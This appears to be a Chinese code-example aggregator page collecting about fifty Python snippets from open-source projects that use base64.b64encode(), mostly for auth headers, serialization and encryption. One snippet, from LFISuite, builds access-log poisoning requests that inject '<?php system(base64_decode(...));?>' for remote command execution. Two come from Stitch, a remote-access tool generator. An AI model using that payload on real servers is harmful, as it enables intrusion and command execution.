Python base64 模块,b64encode() 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用base64.b64encode()

项目:openstack-deploy    作者:yaoice    | 项目源码 | 文件源码
def copy_from_host(module):
    compress = module.params.get('compress')
    src = module.params.get('src')

    if not os.path.exists(src):
        module.fail_json(msg="file not found: {}".format(src))
    if not os.access(src, os.R_OK):
        module.fail_json(msg="file is not readable: {}".format(src))

    mode = oct(os.stat(src).st_mode & 0o777)

    with open(src, 'rb') as f:
        raw_data = f.read()

    sha1 = hashlib.sha1(raw_data).hexdigest()
    data = zlib.compress(raw_data) if compress else raw_data

    module.exit_json(content=base64.b64encode(data), sha1=sha1, mode=mode,
                     source=src)
项目:kafka_store    作者:smyte    | 项目源码 | 文件源码
def save(self, buffer):
        path = urljoin(self.prefix, buffer.path)

        file_obj = buffer.get_rewound_file()
        md5_base64 = base64.b64encode(buffer.md5).decode('ascii')
        self.objects.insert(
            media_body=http.MediaIoBaseUpload(
                file_obj, 'application/octet-stream'
            ),
            name=path,
            body={
                'md5Hash': md5_base64,
                'metadata': {
                    'count': str(buffer.count),
                },
            },
            bucket=self.bucket,
        ).execute()
项目:Stitch    作者:nathanlopez    | 项目源码 | 文件源码
def get_encryption():
    return '''
import base64
from Crypto import Random
from Crypto.Cipher import AES

abbrev = '{2}'
{0} = base64.b64decode('{1}')

def encrypt(raw):
    iv = Random.new().read( AES.block_size )
    cipher = AES.new({0}, AES.MODE_CFB, iv )
    return (base64.b64encode( iv + cipher.encrypt( raw ) ) )

def decrypt(enc):
    enc = base64.b64decode(enc)
    iv = enc[:16]
    cipher = AES.new({0}, AES.MODE_CFB, iv )
    return cipher.decrypt( enc[16:] )
'''.format(st_obf[0],aes_encoded,aes_abbrev)

################################################################################
#                       st_protocol.py stitch_gen variables                    #
################################################################################
项目:newsreap    作者:caronc    | 项目源码 | 文件源码
def encode_public_key(self):
        """
        Based on spotnab, this is the gzipped version of the key
        with base64 applied to it. We encode it as such and
        return it.

        """
        fileobj = StringIO()
        with GzipFile(fileobj=fileobj, mode="wb") as f:
            try:
                f.write(self.public_pem())
            except TypeError:
                # It wasn't initialized yet
                return None

        return b64encode(fileobj.getvalue())
项目:IotCenter    作者:panjanek    | 项目源码 | 文件源码
def handleServerCall(self, payload):
        self.logger.info("Handling server callback with payload {0}".format(payload))
        payloadDict = json.loads(payload)
        if "command" in payloadDict:
            command = payloadDict["command"]
            self.logger.info("Received command: {0}".format(command))
            if command == "blink":
                self.logger.info("BLINK!!!")
            elif command == "reboot":
                self.logger.info("REBOOT!!!")
            elif command == "photo":
                self.logger.info("PHOTO!!!")
                photoFile = "/home/pi/puszcz.jpg"
                with open(photoFile, mode='rb') as file:
                    photoData = file.read()
                    base64data = base64.b64encode(photoData)
                    self.service.sendMessage(json.dumps({'image':base64data, 'type':'jpg'}))               
            else:
                self.logger.info("Command '{0}' unknown".format(command))
项目:DropboxConnect    作者:raguay    | 项目源码 | 文件源码
def encode_primitive(self, validator, value):
        if validator in self.alias_validators:
            self.alias_validators[validator](value)

        if isinstance(validator, bv.Void):
            return None
        elif isinstance(validator, bv.Timestamp):
            return _strftime(value, validator.format)
        elif isinstance(validator, bv.Bytes):
            if self.for_msgpack:
                return value
            else:
                return base64.b64encode(value).decode('ascii')
        elif isinstance(validator, bv.Integer) \
                and isinstance(value, bool):
            # bool is sub-class of int so it passes Integer validation,
            # but we want the bool to be encoded as ``0`` or ``1``, rather
            # than ``False`` or ``True``, respectively
            return int(value)
        else:
            return value
项目:Home-Assistant    作者:jmart518    | 项目源码 | 文件源码
def main(args):
    global HTTPD, CREDENTIALS
    if args:
        load_settings(args[0])
    print("Starting server")
    server_address = (LISTENIP, LISTENPORT)
    if CREDENTIALS:
        CREDENTIALS = base64.b64encode(bytes(CREDENTIALS, "utf-8"))
        Handler = AuthHandler
    else:
        Handler = RequestHandler
    if not SSL_CERTIFICATE:
        HTTPD = HTTPServer(server_address, Handler)
    else:
        HTTPD = socketserver.TCPServer(server_address, Handler)
        HTTPD.socket = ssl.wrap_socket(HTTPD.socket,
                                       certfile=SSL_CERTIFICATE,
                                       keyfile=SSL_KEY,
                                       server_side=True)
    print('Listening on: %s://%s:%i' % ('https' if SSL_CERTIFICATE else 'http',
                                        LISTENIP,
                                        LISTENPORT))
    if BASEPATH:
        os.chdir(BASEPATH)
    HTTPD.serve_forever()
项目:NS_Proj    作者:drstarry    | 项目源码 | 文件源码
def vPrint(actor, sent, otherActor, toPrint, base64encode=True):
    """does verbose printing of stuff, with cutoffs for length and base 64
    encoding
    """
    if VERBOSE:
        label = "%s -> %s" % (actor, otherActor)
        if not sent:
            label = "%s <- %s" % (actor, otherActor)
        if len(label) < 12:
            label = label + (" " * (12 - len(label)))
        if type(toPrint) == str:
            if base64encode:
                toPrint = b64encode(toPrint)
            if len(toPrint) > 100:
                toPrint = toPrint[:100] + "..."
        elif type(toPrint) == list:
            if base64encode:
                toPrint = [b64encode(x) if len(x) < 100
                           else b64encode(x[:100]) + '...' for x in toPrint]
            else:
                toPrint = [x if len(x) < 100
                           else x[:100] + '...' for x in toPrint]
        print "%s: <%s>" % (label, toPrint)
项目:python-libjuju    作者:juju    | 项目源码 | 文件源码
def _http_headers(self):
        """Return dictionary of http headers necessary for making an http
        connection to the endpoint of this Connection.

        :return: Dictionary of headers

        """
        if not self.usertag:
            return {}

        creds = u'{}:{}'.format(
            self.usertag,
            self.password or ''
        )
        token = base64.b64encode(creds.encode())
        return {
            'Authorization': 'Basic {}'.format(token.decode())
        }
项目:cbapi-python    作者:carbonblack    | 项目源码 | 文件源码
def __init__(self, **kwargs):
        # these fields are required in every feed descriptor
        self.required = ["name", "display_name",
                         "summary", "tech_data", "provider_url"]
        self.optional = ["category", "icon", "version", "icon_small"]
        self.noemptystrings = ["name", "display_name", "summary", "tech_data", "category"]
        self.data = kwargs

        # if they are present, set the icon fields of the data to hold
        # the base64 encoded file data from their path
        for icon_field in ["icon", "icon_small"]:
            if icon_field in self.data and os.path.exists(self.data[icon_field]):
                icon_path = self.data.pop(icon_field)
                try:
                    self.data[icon_field] = base64.b64encode(open(icon_path, "rb").read())
                except Exception, err:
                    raise CbIconError("Unknown error reading/encoding icon data: %s" % err)
项目:LFISuite    作者:D35m0nd142    | 项目源码 | 文件源码
def send_access_log_cmd(cmd,host,keyword):
    path = ""

    if("_PHP" in keyword):
        keyword = keyword[:-4]
        if(" " in cmd):
            b64cmd = base64.b64encode(cmd)
            path = "/<?php eval(base64_decode('%s'));?>" %(b64cmd)
        else:
            path = "/<?php %s?>" %(cmd)
    else:
        b64cmd = base64.b64encode(cmd)
        path = "/<?php system(base64_decode('%s'));?>" %(b64cmd)

    s = NoURLEncodingSession()
    url = "%s/%s" %(host,path)

    if("GET" in keyword):
        s.get(url, headers=gen_headers)
    else:
        s.head(url, headers=gen_headers)
项目:sensu_drive    作者:ilavender    | 项目源码 | 文件源码
def sensu_event_resolve(message):

    API_URL = settings.SENSU_API_URL + '/resolve'
    userAndPass = base64.b64encode(str.encode("%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD))).decode("ascii")
    headers = { 'X_REQUESTED_WITH' :'XMLHttpRequest',
               'Accept': 'application/json, text/javascript, */*; q=0.01',
               'Authorization' : 'Basic %s' %  userAndPass }

    try:
        client_name, check_name = message['entity'].split(':')
        post_params = {"client": client_name, "check": check_name}
        request = http.request('POST', API_URL, body=json.dumps(post_params), headers=headers)   
        response = request.status

        if response == 202:
            #reader = codecs.getreader('utf-8')
            #data = json.load(reader(request))
            request.release_conn()
        else:
            logger.error('response: %s' % str(response))

    except:
        logger.error("sensu_event_resolve failed resolving entity: %s" % message['entity'])
        raise
项目:sensu_drive    作者:ilavender    | 项目源码 | 文件源码
def sensu_client_delete(message):

    API_URL = settings.SENSU_API_URL + '/clients/' + message['client']
    userAndPass = base64.b64encode(str.encode("%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD))).decode("ascii")
    headers = { 'X_REQUESTED_WITH' :'XMLHttpRequest',
               'Accept': 'application/json, text/javascript, */*; q=0.01',
               'Authorization' : 'Basic %s' %  userAndPass }

    try:
        request = http.request('DELETE', API_URL, headers=headers)   
        response = request.status

        if response == 202:
            request.release_conn()
            return True
        else:
            logger.error("sensu_client_delete api request failed: %s" % str(response))
            return False
    except:
        logger.error("sensu_client_delete failed deleting client: %s" % message['client'])
        raise
项目:sensu_drive    作者:ilavender    | 项目源码 | 文件源码
def sensu_result_delete(message):

    API_URL = settings.SENSU_API_URL + '/results/' + message['client'] + '/' + message['check']
    userAndPass = base64.b64encode(str.encode("%s:%s" % (settings.SENSU_API_USER, settings.SENSU_API_PASSWORD))).decode("ascii")
    headers = { 'X_REQUESTED_WITH' :'XMLHttpRequest',
               'Accept': 'application/json, text/javascript, */*; q=0.01',
               'Authorization' : 'Basic %s' %  userAndPass }

    try:
        request = http.request('DELETE', API_URL, headers=headers)   
        response = request.status

        if response == 204:
            request.release_conn()
            return True
        else:
            logger.error("sensu_result_delete api request failed: %s" % str(response))
            return False
    except:
        logger.error("sensu_result_delete failed deleting client: %s check: %s" % (message['client'], message['check']))
        raise
项目:plugin.video.exodus    作者:lastship    | 项目源码 | 文件源码
def __init__(self):
        self.priority = 1
        self.language = ['en']
        self.domains = ['ororo.tv']
        self.base_link = 'https://ororo.tv'
        self.moviesearch_link = '/api/v2/movies'
        self.tvsearch_link = '/api/v2/shows'
        self.movie_link = '/api/v2/movies/%s'
        self.show_link = '/api/v2/shows/%s'
        self.episode_link = '/api/v2/episodes/%s'

        self.user = control.setting('ororo.user')
        self.password = control.setting('ororo.pass')
        self.headers = {
        'Authorization': 'Basic %s' % base64.b64encode('%s:%s' % (self.user, self.password)),
        'User-Agent': 'Exodus for Kodi'
        }
项目:oscars2016    作者:0x0ece    | 项目源码 | 文件源码
def _to_json(self, strip, to_serialize=None):
        """Utility function that creates JSON repr. of a credentials object.

        Over-ride is needed since PKCS#12 keys will not in general be JSON
        serializable.

        Args:
            strip: array, An array of names of members to exclude from the
                   JSON.
            to_serialize: dict, (Optional) The properties for this object
                          that will be serialized. This allows callers to modify
                          before serializing.

        Returns:
            string, a JSON representation of this instance, suitable to pass to
            from_json().
        """
        if to_serialize is None:
            to_serialize = copy.copy(self.__dict__)
        pkcs12_val = to_serialize.get(_PKCS12_KEY)
        if pkcs12_val is not None:
            to_serialize[_PKCS12_KEY] = base64.b64encode(pkcs12_val)
        return super(ServiceAccountCredentials, self)._to_json(
            strip, to_serialize=to_serialize)
项目:os-xenapi    作者:openstack    | 项目源码 | 文件源码
def get_console_log(session, arg_dict):
    try:
        raw_dom_id = arg_dict['dom_id']
    except KeyError:
        raise dom0_pluginlib.PluginError("Missing dom_id")
    try:
        dom_id = int(raw_dom_id)
    except ValueError:
        raise dom0_pluginlib.PluginError("Invalid dom_id")

    logfile = open(CONSOLE_LOG_FILE_PATTERN % dom_id, 'rb')
    try:
        try:
            log_content = _last_bytes(logfile)
        except IOError, e:  # noqa
            msg = "Error reading console: %s" % e
            logging.debug(msg)
            raise dom0_pluginlib.PluginError(msg)
    finally:
        logfile.close()

    return base64.b64encode(zlib.compress(log_content))
项目:os-xenapi    作者:openstack    | 项目源码 | 文件源码
def test_inject_file_with_old_agent(self):
        tmp_arg_dict = FAKE_ARG_DICT
        request_id = tmp_arg_dict["id"]
        b64_path = tmp_arg_dict["b64_path"]
        b64_file = tmp_arg_dict["b64_contents"]
        raw_path = base64.b64decode(b64_path)
        raw_file = base64.b64decode(b64_file)
        new_b64 = base64.b64encode("%s,%s" % (raw_path, raw_file))
        self.mock_patch_object(self.agent,
                               '_get_agent_features',
                               'injectfile')
        tmp_arg_dict["value"] = json.dumps({"name": "injectfile",
                                            "value": new_b64})
        tmp_arg_dict["path"] = "data/host/%s" % request_id
        self.agent.inject_file(self.agent, FAKE_ARG_DICT)

        self.agent._wait_for_agent.assert_called_once()
        self.agent.xenstore.write_record.assert_called_with(self.agent,
                                                            tmp_arg_dict)
        self.agent._get_agent_features.assert_called_once()
项目:Projects    作者:it2school    | 项目源码 | 文件源码
def encode_primitive(self, validator, value):
        if validator in self.alias_validators:
            self.alias_validators[validator](value)

        if isinstance(validator, bv.Void):
            return None
        elif isinstance(validator, bv.Timestamp):
            return _strftime(value, validator.format)
        elif isinstance(validator, bv.Bytes):
            if self.for_msgpack:
                return value
            else:
                return base64.b64encode(value).decode('ascii')
        elif isinstance(validator, bv.Integer) \
                and isinstance(value, bool):
            # bool is sub-class of int so it passes Integer validation,
            # but we want the bool to be encoded as ``0`` or ``1``, rather
            # than ``False`` or ``True``, respectively
            return int(value)
        else:
            return value
项目:shadowsocksR-b    作者:hao35954514    | 项目源码 | 文件源码
def client_udp_pre_encrypt(self, buf):
        if self.user_key is None:
            if b':' in to_bytes(self.server_info.protocol_param):
                try:
                    items = to_bytes(self.server_info.protocol_param).split(':')
                    self.user_key = self.hashfunc(items[1]).digest()
                    self.user_id = struct.pack('<I', int(items[0]))
                except:
                    pass
            if self.user_key is None:
                self.user_id = os.urandom(4)
                self.user_key = self.server_info.key
        authdata = os.urandom(3)
        mac_key = self.server_info.key
        md5data = hmac.new(mac_key, authdata, self.hashfunc).digest()
        uid = struct.unpack('<I', self.user_id)[0] ^ struct.unpack('<I', md5data[:4])[0]
        uid = struct.pack('<I', uid)
        rand_len = self.udp_rnd_data_len(md5data, self.random_client)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(self.user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        out_buf = encryptor.encrypt(buf)
        buf = out_buf + os.urandom(rand_len) + authdata + uid
        return buf + hmac.new(self.user_key, buf, self.hashfunc).digest()[:1]
项目:shadowsocksR-b    作者:hao35954514    | 项目源码 | 文件源码
def server_udp_pre_encrypt(self, buf, uid):
        if uid in self.server_info.users:
            user_key = self.server_info.users[uid]
        else:
            uid = None
            if not self.server_info.users:
                user_key = self.server_info.key
            else:
                user_key = self.server_info.recv_iv
        authdata = os.urandom(7)
        mac_key = self.server_info.key
        md5data = hmac.new(mac_key, authdata, self.hashfunc).digest()
        rand_len = self.udp_rnd_data_len(md5data, self.random_server)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        out_buf = encryptor.encrypt(buf)
        buf = out_buf + os.urandom(rand_len) + authdata
        return buf + hmac.new(user_key, buf, self.hashfunc).digest()[:1]
项目:shadowsocksR-b    作者:hao35954514    | 项目源码 | 文件源码
def server_udp_post_decrypt(self, buf):
        mac_key = self.server_info.key
        md5data = hmac.new(mac_key, buf[-8:-5], self.hashfunc).digest()
        uid = struct.unpack('<I', buf[-5:-1])[0] ^ struct.unpack('<I', md5data[:4])[0]
        uid = struct.pack('<I', uid)
        if uid in self.server_info.users:
            user_key = self.server_info.users[uid]
        else:
            uid = None
            if not self.server_info.users:
                user_key = self.server_info.key
            else:
                user_key = self.server_info.recv_iv
        if hmac.new(user_key, buf[:-1], self.hashfunc).digest()[:1] != buf[-1:]:
            return (b'', None)
        rand_len = self.udp_rnd_data_len(md5data, self.random_client)
        encryptor = encrypt.Encryptor(to_bytes(base64.b64encode(user_key)) + to_bytes(base64.b64encode(md5data)), 'rc4')
        out_buf = encryptor.decrypt(buf[:-8 - rand_len])
        return (out_buf, uid)
项目:privcount    作者:privcount    | 项目源码 | 文件源码
def handshake_hmac_get(handshake_key, prefix, server_cookie,
                           client_cookie):
        '''
        Return HMAC(handshake_key, prefix | server_cookie | client_cookie),
        base-64 encoded.
        '''
        hmac = b64encode(get_hmac(handshake_key,
                                  prefix,
                                  server_cookie +
                                  client_cookie))
        assert PrivCountProtocol.handshake_hmac_verify(hmac,
                                                       handshake_key,
                                                       prefix,
                                                       server_cookie,
                                                       client_cookie)
        return hmac
项目:charm-keystone    作者:openstack    | 项目源码 | 文件源码
def get_ssl_ca_settings():
    """ Get the Certificate Authority settings required to use the CA

    :returns: Dictionary with https_keystone and ca_cert set
    """
    ca_data = {}
    https_service_endpoints = config('https-service-endpoints')
    if (https_service_endpoints and
            bool_from_string(https_service_endpoints)):
        # Pass CA cert as client will need it to
        # verify https connections
        ca = get_ca(user=SSH_USER)
        ca_bundle = ca.get_ca_bundle()
        ca_data['https_keystone'] = 'True'
        ca_data['ca_cert'] = b64encode(ca_bundle)
    return ca_data
项目:charm-keystone    作者:openstack    | 项目源码 | 文件源码
def get_ssl_ca_settings():
    """ Get the Certificate Authority settings required to use the CA

    :returns: Dictionary with https_keystone and ca_cert set
    """
    ca_data = {}
    https_service_endpoints = config('https-service-endpoints')
    if (https_service_endpoints and
            bool_from_string(https_service_endpoints)):
        # Pass CA cert as client will need it to
        # verify https connections
        ca = get_ca(user=SSH_USER)
        ca_bundle = ca.get_ca_bundle()
        ca_data['https_keystone'] = 'True'
        ca_data['ca_cert'] = b64encode(ca_bundle)
    return ca_data
项目:FRG-Crowdsourcing    作者:97amarnathk    | 项目源码 | 文件源码
def get_disqus_sso_payload(user):
    """Return remote_auth_s3 and api_key for user."""
    DISQUS_PUBLIC_KEY = current_app.config.get('DISQUS_PUBLIC_KEY')
    DISQUS_SECRET_KEY = current_app.config.get('DISQUS_SECRET_KEY')
    if DISQUS_PUBLIC_KEY and DISQUS_SECRET_KEY:
        if user:
            data = simplejson.dumps({
                'id': user.id,
                'username': user.name,
                'email': user.email_addr,
            })
        else:
            data = simplejson.dumps({})
        # encode the data to base64
        message = base64.b64encode(data)
        # generate a timestamp for signing the message
        timestamp = int(time.time())
        # generate our hmac signature
        sig = hmac.HMAC(DISQUS_SECRET_KEY, '%s %s' % (message, timestamp),
                        hashlib.sha1).hexdigest()

        return message, timestamp, sig, DISQUS_PUBLIC_KEY
    else:
        return None, None, None, None
项目:TanksAndTemples    作者:IntelVCL    | 项目源码 | 文件源码
def generate_md5_file(md5_check_fn, scene_list):
    md5_check = open(md5_check_fn, 'wb')
    for scene in scene_list:
        ply_file = scene + '.ply'
        log_file = scene + '.log'
        if os.path.isfile(ply_file):
            md5_ply_file = generate_file_md5(ply_file, blocksize=2**20)
        else:
            md5_ply_file = ''
        if os.path.isfile(log_file):
            md5_log_file = generate_file_md5(log_file, blocksize=2**20)
        else:
            md5_log_file = ''
        content_md5_log = base64.b64encode(md5_log_file)
        content_md5_ply = base64.b64encode(md5_ply_file)
        print('md5_ply_file: ', ply_file, content_md5_ply)
        print('md5_log_file: ',log_file, content_md5_log)
        md5_check.write("%s###%s\n" % (ply_file, content_md5_ply.decode('UTF-8')))
        md5_check.write("%s###%s\n" % (log_file, content_md5_log.decode('UTF-8')))
    md5_check.close()
项目:swjtu-pyscraper    作者:Desgard    | 项目源码 | 文件源码
def _tag(value):
    if isinstance(value, tuple):
        return {' t': [_tag(x) for x in value]}
    elif isinstance(value, uuid.UUID):
        return {' u': value.hex}
    elif isinstance(value, bytes):
        return {' b': b64encode(value).decode('ascii')}
    elif callable(getattr(value, '__html__', None)):
        return {' m': text_type(value.__html__())}
    elif isinstance(value, list):
        return [_tag(x) for x in value]
    elif isinstance(value, datetime):
        return {' d': http_date(value)}
    elif isinstance(value, dict):
        return dict((k, _tag(v)) for k, v in iteritems(value))
    elif isinstance(value, str):
        try:
            return text_type(value)
        except UnicodeError:
            from flask.debughelpers import UnexpectedUnicodeError
            raise UnexpectedUnicodeError(u'A byte string with '
                u'non-ASCII data was passed to the session system '
                u'which can only store unicode strings.  Consider '
                u'base64 encoding your string (String was %r)' % value)
    return value
项目:TerminalView    作者:Wramberg    | 项目源码 | 文件源码
def html(self):
        """
        Returns :attr:`self.file_obj` as an <img> tag with the src set to a
        data::URI.
        """
        if not self.file_obj:
            return u""
        self.file_obj.seek(0)
        # Need to encode base64 to create a data URI
        encoded = base64.b64encode(self.file_obj.read())
        data_uri = "data:{mimetype};base64,{encoded}".format(
            mimetype=self.mimetype, encoded=encoded.decode('utf-8'))
        link = "%s/%s" % (self.linkpath, os.path.split(self.path)[1])
        if self.original_file:
            link = "%s/%s" % (
                self.linkpath, os.path.split(self.original_file.name)[1])
        if self.thumbnail:
            return self.html_icon_template.format(
                link=link,
                src=data_uri,
                icon=self.thumbnail,
                mimetype=self.mimetype)
        return self.html_template.format(
            link=link, src=data_uri, mimetype=self.mimetype)
项目:PTE    作者:pwn2winctf    | 项目源码 | 文件源码
def add(self, msg_text, to=None):
        current_time = int(time.time())
        if to is None:
            message = {"msg": msg_text, "time": current_time}
        else:
            team_pk = Team(name=to)['crypt_pk']
            encrypted_msg = pysodium.crypto_box_seal(msg_text.encode("utf-8"),
                                                     team_pk)
            encoded_msg = b64encode(encrypted_msg)

            message = {"msg": encoded_msg.decode("utf-8"),
                       "to": to,
                       "time": current_time}

        self.append(message)
        self.save()

        dest = message["to"] if "to" in message else "all"
        SubRepo.push(commit_message='Added news to %s' % dest,
                     merge_request=False)
项目:hesperides-cli    作者:voyages-sncf-technologies    | 项目源码 | 文件源码
def set_conf(profile, username, password, hesperides_endpoint, response_format):
    basic_auth = base64.b64encode(str.encode('%s:%s' % (username, password))).decode('UTF-8')
    config = {'endpoint': hesperides_endpoint, 'format': response_format}
    credentials = {'username': username, 'auth': basic_auth}
    config_writer = ConfigFileWriter()
    config_writer.update_config(profile, config, False)
    credentials_writer = ConfigFileWriter()
    credentials_writer.update_credentials(profile, credentials, False)
    profile_writer = ConfigFileWriter()
    config_writer.update_config('config', {}, False)
项目:Stitch    作者:nathanlopez    | 项目源码 | 文件源码
def encrypt(raw, aes_key=secret):
    iv = Random.new().read( AES.block_size )
    cipher = AES.new(aes_key, AES.MODE_CFB, iv )
    return (base64.b64encode( iv + cipher.encrypt( raw ) ) )
项目:alelo_ofx    作者:dantas    | 项目源码 | 文件源码
def login(cpf, password):
    result = session.post('https://www.meualelo.com.br/meualelo.services/rest/login/authenticate', json={
        'cpf': cpf,
        'pwd': base64.b64encode(password),
        'captchaResponse': '',
    })
    if result.status_code != 200:
        raise WebApiFailure()
项目:flash_services    作者:textbook    | 项目源码 | 文件源码
def headers(self):
        """Get the headers for the service requests."""
        encoding = 'utf8'
        headers = super().headers
        token = b64encode(bytes('{}:{}'.format(
            self.username,
            self.password
        ), encoding))
        headers['Authorization'] = 'Basic {}'.format(str(token, encoding))
        return headers
项目:Cortex-Analyzers    作者:CERT-BDF    | 项目源码 | 文件源码
def submit_sample(self, filepath, filename, tags=['JAMIE_Import', 'TheHive_Import']):
        """
        Uploads a new sample to VMRay api. Filename gets sent base64 encoded.

        :param filepath: path to sample
        :type filepath: str
        :param filename: filename of the original file
        :type filename: str
        :param tags: List of tags to apply to the sample
        :type tags: list(str)
        :returns: Dictionary of results
        :rtype: dict
        """
        apiurl = '/rest/sample/submit?sample_file'
        params = {'sample_filename_b64enc': base64.b64encode(filename.encode('utf-8')),
                  'reanalyze': self.reanalyze}
        if tags:
            params['tags'] = ','.join(tags)

        if os.path.isfile(filepath):
            res = self.session.post(url=self.url + apiurl,
                                    files=[('sample_file', open(filepath, mode='rb'))],
                                    params=params)
            if res.status_code == 200:
                return json.loads(res.text)
            else:
                raise BadResponseError('Response from VMRay was not HTTP 200.'
                                       ' Responsecode: {}; Text: {}'.format(res.status_code, res.text))
        else:
            raise SampleFileNotFoundError('Given sample file was not found.')
项目:rust_pypi_example    作者:mckaymatt    | 项目源码 | 文件源码
def encrypt(pubkey, password):
    """Encrypt password using given RSA public key and encode it with base64.

    The encrypted password can only be decrypted by someone with the
    private key (in this case, only Travis).
    """
    key = load_key(pubkey)
    encrypted_password = key.encrypt(password, PKCS1v15())
    return base64.b64encode(encrypted_password)
项目:newsreap    作者:caronc    | 项目源码 | 文件源码
def encode_private_key(self):
        """
        Based on spotnab, this is the gzipped version of the key
        with base64 applied to it. We encode it as such and
        return it.

        """
        fileobj = StringIO()
        with GzipFile(fileobj=fileobj, mode="wb") as f:
            try:
                f.write(self.private_pem())
            except TypeError:
                # It wasn't initialized yet
                return None
        return b64encode(fileobj.getvalue())
项目:Starfish    作者:BillWang139967    | 项目源码 | 文件源码
def encrypt(raw):
    raw = pad(raw)
    iv = Random.new().read(AES.block_size)
    cipher = AES.new(KEY, AES.MODE_CBC, iv)
    return base64.b64encode( iv + cipher.encrypt(raw) )
项目:Starfish    作者:BillWang139967    | 项目源码 | 文件源码
def encrypt(raw):
    raw = pad(raw)
    iv = Random.new().read(AES.block_size)
    cipher = AES.new(KEY, AES.MODE_CBC, iv)
    return base64.b64encode( iv + cipher.encrypt(raw) )
项目:aws-consolidated-admin    作者:awslabs    | 项目源码 | 文件源码
def encrypt(plaintext):
    return base64.b64encode(kms.encrypt(
        KeyId=KMS_KEY_ID, Plaintext=plaintext)['CiphertextBlob'])
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def _b64_encode_bytes(b):
    return base64.b64encode(b).decode("ascii")
项目:DCPanel    作者:vladgr    | 项目源码 | 文件源码
def encrypt(text):
    """text (string)"""
    aes = AES.new(settings.CRYPT_KEY, AES.MODE_CFB, settings.CRYPT_IV)
    return base64.b64encode(aes.encrypt(text.encode())).decode()
项目:calendary    作者:DavidHickman    | 项目源码 | 文件源码
def encrypt(pubkey, password):
    """Encrypt password using given RSA public key and encode it with base64.

    The encrypted password can only be decrypted by someone with the
    private key (in this case, only Travis).
    """
    key = load_key(pubkey)
    encrypted_password = key.encrypt(password, PKCS1v15())
    return base64.b64encode(encrypted_password)
项目:ios-xr-grpc-python    作者:cisco-grpc-connection-libs    | 项目源码 | 文件源码
def _FieldToJsonObject(self, field, value):
    """Converts field value according to Proto3 JSON Specification."""
    if field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_MESSAGE:
      return self._MessageToJsonObject(value)
    elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_ENUM:
      enum_value = field.enum_type.values_by_number.get(value, None)
      if enum_value is not None:
        return enum_value.name
      else:
        raise SerializeToJsonError('Enum field contains an integer value '
                                   'which can not mapped to an enum value.')
    elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_STRING:
      if field.type == descriptor.FieldDescriptor.TYPE_BYTES:
        # Use base64 Data encoding for bytes
        return base64.b64encode(value).decode('utf-8')
      else:
        return value
    elif field.cpp_type == descriptor.FieldDescriptor.CPPTYPE_BOOL:
      return bool(value)
    elif field.cpp_type in _INT64_TYPES:
      return str(value)
    elif field.cpp_type in _FLOAT_TYPES:
      if math.isinf(value):
        if value < 0.0:
          return _NEG_INFINITY
        else:
          return _INFINITY
      if math.isnan(value):
        return _NAN
    return value
项目:docklet    作者:unias    | 项目源码 | 文件源码
def generate_cookie(name, securekey):
    #print (">> generate cookie for %s" % name)
    content = { 'name':name, 'login-time': time.asctime() }
    text = json.dumps(content)
    part1 = base64.b64encode(text.encode('ascii'))
    part2 = hashlib.md5( (text+securekey).encode('ascii') ).hexdigest()
    # part1 is binary(ascii) and part2 is str(utf-8)
    cookie = str(part1, encoding='utf-8') +"."+ part2
    #print ("cookie : %s" % cookie)
    return cookie
项目:docklet    作者:unias    | 项目源码 | 文件源码
def generate_auth_token(self, expiration = 3600):
        s = Serializer(app.config['SECRET_KEY'], expires_in = expiration)
        str = s.dumps({'id': self.id})
        return b64encode(str).decode('utf-8')
项目:pytest-selenium-pdiff    作者:rentlytics    | 项目源码 | 文件源码
def get_image_as_base64(filename):
    with open(filename, 'rb') as fp:
        content = fp.read()
        return base64.b64encode(content).decode('ascii')
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def _temporary_keychain():
    """
    This function creates a temporary Mac keychain that we can use to work with
    credentials. This keychain uses a one-time password and a temporary file to
    store the data. We expect to have one keychain per socket. The returned
    SecKeychainRef must be freed by the caller, including calling
    SecKeychainDelete.

    Returns a tuple of the SecKeychainRef and the path to the temporary
    directory that contains it.
    """
    # Unfortunately, SecKeychainCreate requires a path to a keychain. This
    # means we cannot use mkstemp to use a generic temporary file. Instead,
    # we're going to create a temporary directory and a filename to use there.
    # This filename will be 8 random bytes expanded into base64. We also need
    # some random bytes to password-protect the keychain we're creating, so we
    # ask for 40 random bytes.
    random_bytes = os.urandom(40)
    filename = base64.b64encode(random_bytes[:8]).decode('utf-8')
    password = base64.b64encode(random_bytes[8:])  # Must be valid UTF-8
    tempdirectory = tempfile.mkdtemp()

    keychain_path = os.path.join(tempdirectory, filename).encode('utf-8')

    # We now want to create the keychain itself.
    keychain = Security.SecKeychainRef()
    status = Security.SecKeychainCreate(
        keychain_path,
        len(password),
        password,
        False,
        None,
        ctypes.byref(keychain)
    )
    _assert_no_error(status)

    # Having created the keychain, we want to pass it off to the caller.
    return keychain, tempdirectory
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def _b64_encode_bytes(b):
    return base64.b64encode(b).decode("ascii")
项目:openstack-deploy    作者:yaoice    | 项目源码 | 文件源码
def read_file(filename):
    filename_path = os.path.join('/etc/ceph', filename)

    if not os.path.exists(filename_path):
        json_exit("file not found: {}".format(filename_path), failed=True)
    if not os.access(filename_path, os.R_OK):
        json_exit("file not readable: {}".format(filename_path), failed=True)

    with open(filename_path, 'rb') as f:
        raw_data = f.read()

    return {'content': base64.b64encode(zlib.compress(raw_data)),
            'sha1': hashlib.sha1(raw_data).hexdigest(),
            'filename': filename}